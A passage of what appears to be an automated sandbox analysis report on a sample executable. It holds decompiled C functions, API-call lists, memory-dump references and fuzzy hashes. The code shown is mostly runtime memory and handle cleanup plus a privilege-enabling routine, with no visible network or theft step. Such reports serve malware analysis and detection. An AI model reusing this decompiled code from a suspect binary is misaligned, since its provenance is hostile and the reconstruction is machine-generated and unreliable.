                0x00cc740f
                0x00cc7418
                0x00cc741b
                0x00cc7420
                0x00cc7423
                0x00cc7428
                0x00000000
                0x00000000
                0x00cc742a
                0x00000000
                0x00cc73ed
                0x00cc73ed
                0x00cc73ef
                0x00cc73f8
                0x00cc73fb
                0x00cc7400
                0x00cc7403
                0x00cc7408
                0x00cc7432
                0x00cc7435
                0x00cc7437
                0x00cc743a
                0x00cc7442
                0x00cc7448
                0x00cc744f
                0x00cc7451
                0x00cc7459
                0x00cc7468
                0x00cc746c
                0x00cc746e
                0x00cc7471
                0x00000000
                0x00000000
                0x00cc7473
                0x00cc7476
                0x00cc7478
                0x00cc7478
                0x00cc7479
                0x00cc747b
                0x00cc747e
                0x00000000
                0x00cc7478
                0x00000000
                0x00cc7408
                0x00cc73eb
                0x00000000

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: ed440352e0ee4c6212e60e30ed2c60c2fb7b1d3513cd7abcb1525b827791e54b
                • Instruction ID: 47c4f5e94018a79a430bb5ff42a743b9cc824f09f1864591a1c3d940430aa2a1
                • Opcode Fuzzy Hash: ed440352e0ee4c6212e60e30ed2c60c2fb7b1d3513cd7abcb1525b827791e54b
                • Instruction Fuzzy Hash: 8E418F36A002049FCB14DF78C881F5EB7A6EF89714F1546ADE526EB291D631AE01DF81
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CCABA6, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                Download Yara Rule
                C-Code - Quality: 93%
                			E00CCABA6() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E00CCAB6F(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E00CC7A8A(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E00CC7A50(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












                0x00ccabb5
                0x00ccabbb
                0x00ccac13
                0x00ccac13
                0x00ccabbd
                0x00ccabbe
                0x00ccabc3
                0x00ccabcc
                0x00ccabd2
                0x00ccabd8
                0x00ccabdd
                0x00000000
                0x00ccabdf
                0x00ccabe5
                0x00ccabea
                0x00ccac08
                0x00ccac02
                0x00ccac02
                0x00ccac04
                0x00ccac04
                0x00ccac0b
                0x00ccac10
                0x00ccabdd
                0x00ccac17
                0x00ccac1a
                0x00ccac1a
                0x00ccac28

                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 00CCABAF
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CCABD2
                  • Part of subcall function 00CC7A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CC2FA6,?,0000015D,?,?,?,?,00CC4482,000000FF,00000000,?,?), ref: 00CC7ABC
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00CCABF8
                • _free.LIBCMT ref: 00CCAC0B
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CCAC1A
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                • String ID:
                • API String ID: 336800556-0
                • Opcode ID: 4e4ece1beee9ed1b48d4ece04c962451c1eee2e6787751a286d302d9d44bd883
                • Instruction ID: 6dcd8d39ed0a29a60cd9b5e2d224ca6f95919c736c0523c9988893ab44a75e0a
                • Opcode Fuzzy Hash: 4e4ece1beee9ed1b48d4ece04c962451c1eee2e6787751a286d302d9d44bd883
                • Instruction Fuzzy Hash: D30188726026197F23211677EC8CF7F7A6DDFC6B64315411EF914D2141DE628E0295B1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC859A, Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E00CC859A(void* __ecx, void* __edx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				long _t17;

				_t11 = __ecx;
				_t17 = GetLastError();
				_t10 = 0;
				_t2 =  *0xcdd6ac; // 0x6
				_t20 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t16 = E00CC7B1B(_t11, 1, 0x364);
					_pop(_t13);
					if(_t16 != 0) {
						_t4 = E00CC9BA9(_t13, _t17, __eflags,  *0xcdd6ac, _t16);
						__eflags = _t4;
						if(_t4 != 0) {
							E00CC8388(_t13, _t16, 0xd00418);
							E00CC7A50(_t10);
							__eflags = _t16;
							if(_t16 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t16);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E00CC7A50();
						L8:
						SetLastError(_t17);
					}
				} else {
					_t16 = E00CC9B53(_t11, _t17, _t20, _t2);
					if(_t16 != 0) {
						L9:
						SetLastError(_t17);
						_t10 = _t16;
					} else {
						goto L2;
					}
				}
				return _t10;
			}











                0x00cc859a
                0x00cc85a5
                0x00cc85a7
                0x00cc85a9
                0x00cc85ae
                0x00cc85b1
                0x00cc85bf
                0x00cc85cb
                0x00cc85ce
                0x00cc85d1
                0x00cc85e3
                0x00cc85e8
                0x00cc85ea
                0x00cc85f5
                0x00cc85fb
                0x00cc8603
                0x00cc8605
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00cc85ec
                0x00cc85ec
                0x00000000
                0x00cc85ec
                0x00cc85d3
                0x00cc85d3
                0x00cc85d4
                0x00cc85d4
                0x00cc8607
                0x00cc8608
                0x00cc8608
                0x00cc85b3
                0x00cc85b9
                0x00cc85bd
                0x00cc8610
                0x00cc8611
                0x00cc8617
                0x00000000
                0x00000000
                0x00000000
                0x00cc85bd
                0x00cc861e

                APIs
                • GetLastError.KERNEL32(?,?,?,00CC7ED1,00CC7B6D,?,00CC8544,00000001,00000364,?,00CC2E0F,?,?,00CE00E0), ref: 00CC859F
                • _free.LIBCMT ref: 00CC85D4
                • _free.LIBCMT ref: 00CC85FB
                • SetLastError.KERNEL32(00000000,?,00CE00E0), ref: 00CC8608
                • SetLastError.KERNEL32(00000000,?,00CE00E0), ref: 00CC8611
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ErrorLast$_free
                • String ID:
                • API String ID: 3170660625-0
                • Opcode ID: 985f4ac6a25bbe25e22ad36bc83d4df3003767838b3e2f8b65eca8d604ac88fa
                • Instruction ID: 8899198092ad7893a66b62d140c3cd210a51b0500aba0ab5c25ad7e5e86108c7
                • Opcode Fuzzy Hash: 985f4ac6a25bbe25e22ad36bc83d4df3003767838b3e2f8b65eca8d604ac88fa
                • Instruction Fuzzy Hash: AD01F476245A002BE3123735EC85F2F2659DBD1761726012EF82AD3293EF71CE0AA168
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB03C7, Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E00CB03C7(void* __ecx) {
				intOrPtr _v16;
				void* __ebp;
				int _t16;
				void** _t21;
				long* _t25;
				void* _t28;
				void* _t30;
				intOrPtr _t31;

				_t22 = __ecx;
				_push(0xffffffff);
				_push(E00CD1161);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t31;
				_t28 = __ecx;
				E00CB0697(__ecx);
				_t25 = 0;
				 *((char*)(__ecx + 0x314)) = 1;
				ReleaseSemaphore( *(__ecx + 0x318), 0x40, 0);
				if( *((intOrPtr*)(_t28 + 0x104)) > 0) {
					_t21 = _t28 + 4;
					do {
						E00CB04BA(_t22, _t30,  *_t21);
						CloseHandle( *_t21);
						_t25 = _t25 + 1;
						_t21 =  &(_t21[1]);
					} while (_t25 <  *((intOrPtr*)(_t28 + 0x104)));
				}
				DeleteCriticalSection(_t28 + 0x320);
				CloseHandle( *(_t28 + 0x318));
				_t16 = CloseHandle( *(_t28 + 0x31c));
				 *[fs:0x0] = _v16;
				return _t16;
			}











                0x00cb03c7
                0x00cb03d0
                0x00cb03d2
                0x00cb03d7
                0x00cb03d8
                0x00cb03e2
                0x00cb03e4
                0x00cb03e9
                0x00cb03eb
                0x00cb03fb
                0x00cb0407
                0x00cb0409
                0x00cb040c
                0x00cb040e
                0x00cb0415
                0x00cb041b
                0x00cb041c
                0x00cb041f
                0x00cb040c
                0x00cb042e
                0x00cb043a
                0x00cb0446
                0x00cb0451
                0x00cb045c

                APIs
                  • Part of subcall function 00CB0697: ResetEvent.KERNEL32(?), ref: 00CB06A9
                  • Part of subcall function 00CB0697: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00CB06BD
                • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00CB03FB
                • CloseHandle.KERNEL32(?,?), ref: 00CB0415
                • DeleteCriticalSection.KERNEL32(?), ref: 00CB042E
                • CloseHandle.KERNEL32(?), ref: 00CB043A
                • CloseHandle.KERNEL32(?), ref: 00CB0446
                  • Part of subcall function 00CB04BA: WaitForSingleObject.KERNEL32(?,000000FF,00CB05D9,?,?,00CB064E,?,?,?,?,?,00CB0638), ref: 00CB04C0
                  • Part of subcall function 00CB04BA: GetLastError.KERNEL32(?,?,00CB064E,?,?,?,?,?,00CB0638), ref: 00CB04CC
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                • String ID:
                • API String ID: 1868215902-0
                • Opcode ID: b9667f4589e17406f991c6b79822bbf0b147a0b1b98abd852233d5a3f86e82b2
                • Instruction ID: 86c34954bf6d07da7b66bf6e81ed2480447740a8d143a22274fdc16efc5bb910
                • Opcode Fuzzy Hash: b9667f4589e17406f991c6b79822bbf0b147a0b1b98abd852233d5a3f86e82b2
                • Instruction Fuzzy Hash: A701B172000B04EBC7229B68DC84BCBBBE9FB58710F00452AF66B92160CB757944CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CCB461, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CCB461(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0xcddd50; // 0xcddd44
					if(_t23 != 0) {
						E00CC7A50(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xcddd54; // 0xd0088c
					if(_t24 != 0) {
						E00CC7A50(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xcddd58; // 0xd0088c
					if(_t25 != 0) {
						E00CC7A50(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xcddd80; // 0xcddd48
					if(_t26 != 0) {
						E00CC7A50(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0xcddd84; // 0xd00890
					if(_t27 != 0) {
						return E00CC7A50(_t6);
					}
				}
				return _t6;
			}










                0x00ccb467
                0x00ccb46c
                0x00ccb470
                0x00ccb476
                0x00ccb479
                0x00ccb47e
                0x00ccb482
                0x00ccb488
                0x00ccb48b
                0x00ccb490
                0x00ccb494
                0x00ccb49a
                0x00ccb49d
                0x00ccb4a2
                0x00ccb4a6
                0x00ccb4ac
                0x00ccb4af
                0x00ccb4b4
                0x00ccb4b5
                0x00ccb4b8
                0x00ccb4be
                0x00000000
                0x00ccb4c6
                0x00ccb4be
                0x00ccb4c9

                APIs
                • _free.LIBCMT ref: 00CCB479
                  • Part of subcall function 00CC7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCB4F8,?,00000000,?,00000000,?,00CCB51F,?,00000007,?,?,00CCB91C,?), ref: 00CC7A66
                  • Part of subcall function 00CC7A50: GetLastError.KERNEL32(?,?,00CCB4F8,?,00000000,?,00000000,?,00CCB51F,?,00000007,?,?,00CCB91C,?,?), ref: 00CC7A78
                • _free.LIBCMT ref: 00CCB48B
                • _free.LIBCMT ref: 00CCB49D
                • _free.LIBCMT ref: 00CCB4AF
                • _free.LIBCMT ref: 00CCB4C1
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: d61dffd268737e5e5867d60f475ed3e1fe7903912d0700471c0cbeb821b9634b
                • Instruction ID: aa50c62218b9e825f1dd436123304a6069f4d79d3207b730edbcbbffb2c186ed
                • Opcode Fuzzy Hash: d61dffd268737e5e5867d60f475ed3e1fe7903912d0700471c0cbeb821b9634b
                • Instruction Fuzzy Hash: 15F01232909600ABCA64DBA5E886F1FB7DEEE00710B64580EF05FE7511C734FE80DA64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC75DB, Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                Download Yara Rule
                C-Code - Quality: 91%
                			E00CC75DB(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0xcddd40; // 0xf124e8
					if(_t7 != 0xcddb20) {
						E00CC7A50(_t7);
						 *0xcddd40 = 0xcddb20;
					}
				}
				E00CC7A50( *0xd00410);
				 *0xd00410 = 0;
				E00CC7A50( *0xd00414);
				 *0xd00414 = 0;
				E00CC7A50( *0xd00860);
				 *0xd00860 = 0;
				E00CC7A50( *0xd00864);
				 *0xd00864 = 0;
				return 1;
			}




                0x00cc75e4
                0x00cc75e8
                0x00cc75ea
                0x00cc75f6
                0x00cc75f9
                0x00cc75ff
                0x00cc75ff
                0x00cc75f6
                0x00cc760b
                0x00cc7618
                0x00cc761e
                0x00cc7629
                0x00cc762f
                0x00cc763a
                0x00cc7640
                0x00cc7648
                0x00cc7651

                APIs
                • _free.LIBCMT ref: 00CC75F9
                  • Part of subcall function 00CC7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCB4F8,?,00000000,?,00000000,?,00CCB51F,?,00000007,?,?,00CCB91C,?), ref: 00CC7A66
                  • Part of subcall function 00CC7A50: GetLastError.KERNEL32(?,?,00CCB4F8,?,00000000,?,00000000,?,00CCB51F,?,00000007,?,?,00CCB91C,?,?), ref: 00CC7A78
                • _free.LIBCMT ref: 00CC760B
                • _free.LIBCMT ref: 00CC761E
                • _free.LIBCMT ref: 00CC762F
                • _free.LIBCMT ref: 00CC7640
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 3a962125343618e5cac41194f58dc1714a92f2f92b9ae054ce22e295b3f0b3a7
                • Instruction ID: 3ced608259afc79de8b0bb9fb752c4b02552554ef7d73f87e9bc66b25171fe93
                • Opcode Fuzzy Hash: 3a962125343618e5cac41194f58dc1714a92f2f92b9ae054ce22e295b3f0b3a7
                • Instruction Fuzzy Hash: 9CF01D70805718ABCB41AF25EC01B5E3FA5F704714B06621EF11A97371C7304601AEE9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC6C73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                Download Yara Rule
                C-Code - Quality: 88%
                			E00CC6C73(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E00CCA7B3(_t52);
					GetModuleFileNameA(0, 0xd002b8, 0x104);
					_t49 =  *0xd00868; // 0xf032f0
					 *0xd00870 = 0xd002b8;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0xd002b8;
					}
					_v8 = 0;
					_v16 = 0;
					E00CC6D97(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E00CC6F0C(_v8, _v16, 1);
					if(_t64 != 0) {
						E00CC6D97(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E00CCA2CE(_t49, 0, _t64, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0xd0085c = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0xd00860 = _t59;
									L16:
									E00CC7A50(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0xd0085c = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0xd00860 = _t43;
						goto L10;
					} else {
						_t44 = E00CC7ECC();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E00CC7A50(_t64);
						return _t50;
					}
				} else {
					_t45 = E00CC7ECC();
					_t65 = 0x16;
					 *_t45 = _t65;
					E00CC7DAB();
					return _t65;
				}
			}





















                0x00cc6c73
                0x00cc6c80
                0x00cc6ca0
                0x00cc6cb3
                0x00cc6cb9
                0x00cc6cbf
                0x00cc6cc7
                0x00cc6cce
                0x00cc6cce
                0x00cc6cd3
                0x00cc6cda
                0x00cc6ce1
                0x00cc6cf3
                0x00cc6cfa
                0x00cc6d19
                0x00cc6d25
                0x00cc6d40
                0x00cc6d43
                0x00cc6d4a
                0x00cc6d50
                0x00cc6d57
                0x00cc6d5a
                0x00cc6d5c
                0x00cc6d60
                0x00cc6d6a
                0x00cc6d6a
                0x00cc6d6c
                0x00cc6d72
                0x00cc6d75
                0x00cc6d77
                0x00cc6d7d
                0x00cc6d7e
                0x00cc6d84
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00cc6d62
                0x00cc6d62
                0x00cc6d62
                0x00cc6d65
                0x00cc6d66
                0x00000000
                0x00cc6d62
                0x00cc6d52
                0x00000000
                0x00cc6d52
                0x00cc6d2b
                0x00cc6d30
                0x00cc6d32
                0x00cc6d34
                0x00000000
                0x00cc6cfc
                0x00cc6cfc
                0x00cc6d01
                0x00cc6d03
                0x00cc6d04
                0x00cc6d39
                0x00cc6d39
                0x00cc6d87
                0x00cc6d88
                0x00000000
                0x00cc6d91
                0x00cc6c88
                0x00cc6c88
                0x00cc6c8f
                0x00cc6c90
                0x00cc6c92
                0x00000000
                0x00cc6c97

                APIs
                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\dAkJsQr7A9.exe,00000104), ref: 00CC6CB3
                • _free.LIBCMT ref: 00CC6D7E
                • _free.LIBCMT ref: 00CC6D88
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _free$FileModuleName
                • String ID: C:\Users\user\Desktop\dAkJsQr7A9.exe
                • API String ID: 2506810119-2619454627
                • Opcode ID: 16a66f87db5eec41eb4d9486037dadb8b8fd9bebd022060bdf9fceff3aac41f3
                • Instruction ID: d65524a7d25aa4cf5a91812c044728ecb55fc4a953825fe9d74d3173aac3fc6c
                • Opcode Fuzzy Hash: 16a66f87db5eec41eb4d9486037dadb8b8fd9bebd022060bdf9fceff3aac41f3
                • Instruction Fuzzy Hash: 6A315071A04318BFDB21EF99D985F9EBBF8EB85310F10416EF41A97211D6709E41DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA73B9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                Download Yara Rule
                C-Code - Quality: 63%
                			E00CA73B9(void* __ebx, void* __edx, void* __esi) {
				void* _t26;
				long _t32;
				void* _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t52;
				void* _t57;
				void* _t58;
				void* _t61;

				_t57 = __esi;
				_t52 = __edx;
				_t42 = __ebx;
				E00CBD870(E00CD1321, _t61);
				E00CBD940();
				 *((intOrPtr*)(_t61 - 0x20)) = 0;
				 *((intOrPtr*)(_t61 - 0x1c)) = 0;
				 *((intOrPtr*)(_t61 - 0x18)) = 0;
				 *((intOrPtr*)(_t61 - 0x14)) = 0;
				 *((char*)(_t61 - 0x10)) = 0;
				_t54 =  *((intOrPtr*)(_t61 + 8));
				_push(0);
				_push(0);
				 *((intOrPtr*)(_t61 - 4)) = 0;
				_push(_t61 - 0x20);
				if(E00CA399D( *((intOrPtr*)(_t61 + 8)), _t52) != 0) {
					if( *0xce0042 == 0) {
						if(E00CA7A15(L"SeSecurityPrivilege") != 0) {
							 *0xce0041 = 1;
						}
						E00CA7A15(L"SeRestorePrivilege");
						 *0xce0042 = 1;
					}
					_push(_t57);
					_t58 = 7;
					if( *0xce0041 != 0) {
						_t58 = 0xf;
					}
					_push(_t42);
					_t43 =  *((intOrPtr*)(_t61 - 0x20));
					_push(_t43);
					_push(_t58);
					_push( *((intOrPtr*)(_t61 + 0xc)));
					if( *0xcdde80() == 0) {
						if(E00CAB32C( *((intOrPtr*)(_t61 + 0xc)), _t61 - 0x106c, 0x800) == 0) {
							L10:
							E00CA6BF5(_t70, 0x52, _t54 + 0x1e,  *((intOrPtr*)(_t61 + 0xc)));
							_t32 = GetLastError();
							E00CBE214(_t32);
							if(_t32 == 5 && E00CAFC98() == 0) {
								E00CA1567(_t61 - 0x6c, 0x18);
								E00CB0A9F(_t61 - 0x6c);
							}
							E00CA6E03(0xce00e0, 1);
						} else {
							_t39 =  *0xcdde80(_t61 - 0x106c, _t58, _t43);
							_t70 = _t39;
							if(_t39 == 0) {
								goto L10;
							}
						}
					}
				}
				_t26 = E00CA159C(_t61 - 0x20);
				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
				return _t26;
			}












                0x00ca73b9
                0x00ca73b9
                0x00ca73b9
                0x00ca73be
                0x00ca73c8
                0x00ca73d0
                0x00ca73d3
                0x00ca73d6
                0x00ca73d9
                0x00ca73dc
                0x00ca73df
                0x00ca73e4
                0x00ca73e5
                0x00ca73e6
                0x00ca73ec
                0x00ca73f4
                0x00ca7401
                0x00ca740f
                0x00ca7411
                0x00ca7411
                0x00ca741d
                0x00ca7422
                0x00ca7422
                0x00ca7430
                0x00ca7433
                0x00ca7434
                0x00ca7438
                0x00ca7438
                0x00ca7439
                0x00ca743a
                0x00ca743d
                0x00ca743e
                0x00ca743f
                0x00ca744a
                0x00ca7462
                0x00ca7477
                0x00ca7480
                0x00ca7485
                0x00ca7494
                0x00ca749c
                0x00ca74ac
                0x00ca74b4
                0x00ca74b4
                0x00ca74bd
                0x00ca7464
                0x00ca746d
                0x00ca7473
                0x00ca7475
                0x00000000
                0x00000000
                0x00ca7475
                0x00ca7462
                0x00ca74c3
                0x00ca74c7
                0x00ca74d0
                0x00ca74da

                APIs
                • __EH_prolog.LIBCMT ref: 00CA73BE
                  • Part of subcall function 00CA399D: __EH_prolog.LIBCMT ref: 00CA39A2
                • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00CA7485
                  • Part of subcall function 00CA7A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CA7A24
                  • Part of subcall function 00CA7A15: GetLastError.KERNEL32 ref: 00CA7A6A
                  • Part of subcall function 00CA7A15: CloseHandle.KERNEL32(?), ref: 00CA7A79
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                • String ID: SeRestorePrivilege$SeSecurityPrivilege
                • API String ID: 3813983858-639343689
                • Opcode ID: e1d67518083d3637cb00a3e28aae02f63c31f2f5681624bc1b22160413452ab8
                • Instruction ID: bcdf8cc7d2a36f7724547c9a200d93052dd0a6d632f673159af877c767395e2c
                • Opcode Fuzzy Hash: e1d67518083d3637cb00a3e28aae02f63c31f2f5681624bc1b22160413452ab8
                • Instruction Fuzzy Hash: DE31FB71E04246AADF20EBA4DC41BEE7B78BF56308F044125F859A7152C7B44E44DBA1
                Uniqueness

